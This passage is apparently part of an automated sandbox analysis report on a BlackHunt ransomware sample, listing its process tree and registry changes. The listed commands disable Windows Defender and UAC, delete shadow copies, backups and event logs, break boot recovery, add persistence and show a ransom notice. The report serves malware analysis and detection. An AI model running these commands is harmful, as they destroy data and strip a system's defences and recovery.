of 3944 1404 cmd.exe 114 PID 1404 wrote to memory of 3944 1404 cmd.exe 114 PID 64 wrote to memory of 3048 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 122 PID 64 wrote to memory of 3048 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 122 PID 64 wrote to memory of 1536 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 116 PID 64 wrote to memory of 1536 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 116 PID 64 wrote to memory of 2828 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 121 PID 64 wrote to memory of 2828 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 121 PID 4744 wrote to memory of 1428 4744 cmd.exe 119 PID 4744 wrote to memory of 1428 4744 cmd.exe 119 PID 64 wrote to memory of 4436 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 197 PID 64 wrote to memory of 4436 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 197 PID 64 wrote to memory of 3768 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 125 PID 64 wrote to memory of 3768 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 125 PID 532 wrote to memory of 4004 532 cmd.exe 127 PID 532 wrote to memory of 4004 532 cmd.exe 127 PID 64 wrote to memory of 384 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 129 PID 64 wrote to memory of 384 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 129 PID 3052 wrote to memory of 1796 3052 cmd.exe 130 PID 3052 wrote to memory of 1796 3052 cmd.exe 130 PID 1536 wrote to memory of 3352 1536 cmd.exe 131 PID 1536 wrote to memory of 3352 1536 cmd.exe 131 PID 2828 wrote to memory of 2408 2828 cmd.exe 132 PID 2828 wrote to memory of 2408 2828 cmd.exe 132 PID 64 wrote to memory of 4280 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 133 PID 64 wrote to memory of 4280 64 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe 133 PID 4436 wrote to memory of 4180 4436 Conhost.exe 135 PID 4436 wrote to memory of 4180 4436 Conhost.exe 135 PID 3768 wrote to memory of 860 3768 cmd.exe 136 PID 3768 wrote to memory of 860 3768 cmd.exe 136 PID 3048 wrote to memory of 2760 3048 cmd.exe 138 PID 3048 wrote to memory of 2760 3048 cmd.exe 138 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe"C:\Users\Admin\AppData\Local\Temp\26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:64 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:4932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:5016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:5048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3052
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:3352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:4436
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:384
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4280
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2692
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4820
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1596
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:5088
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4068
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:6912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4392
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:7948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe" /F2⤵
- Modifies registry class
PID:4932 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe" /F3⤵
- Creates scheduled task(s)
PID:4632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4344
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1968
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:7684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1504
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2452
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3180
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4864
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4664
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:4436
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2476
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1340
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:8432
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:15320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:5376
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:9144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8316
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:7716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:15852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:16620
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:8932
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:16448
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:9928
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:10172
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:16396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:8096
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:452
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:820
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:6612
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:8180
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:10236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:8124
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:11468
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:16480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:7908
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:5912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:16400
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:16532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:17060 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:16656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16656 -s 14564⤵
- Program crash
PID:17024
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:6588
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:6584
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe"2⤵PID:1512
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:8288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:7540
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:16508
-
-
-
